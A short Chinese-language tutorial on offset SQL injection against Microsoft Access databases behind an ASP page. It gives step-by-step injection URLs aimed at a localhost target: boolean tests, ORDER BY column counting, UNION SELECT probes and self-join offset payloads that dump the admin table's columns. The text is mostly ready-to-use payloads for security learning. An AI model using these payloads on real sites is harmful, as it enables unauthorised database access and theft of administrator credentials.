Access偏移注入:表名知道,列名无法获取的情况下。
1、判断注入点
127.0.0.1/asp/index.asp?id=1513 and 1=1 正常
127.0.0.1/asp/index.asp?id=1513 and 1=2 错误
2、查询字段个数
127.0.0.1/asp/index.asp?id=1513 order by 22 正常
127.0.0.1/asp/index.asp?id=1513 order by 23 错误
3、爆出显位
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
4、判断表内存在的字段个数
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin 错误
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin 错误
直到......
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 正确
说明了admin表下有6个字段;
用"*"代表 admin 表的字段数,计算*代替字符的位数。
Access偏移注入原理,基本公式为:
order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案;
也就是:
* = 6个字符
2 × * = 12个字符
22 - 12 = 10个字符
5、爆列名数据
一级偏移语句:
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
如果你发现,上面查看了网页源码也爆不出数据,请用以下方法:
二级偏移语句:
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4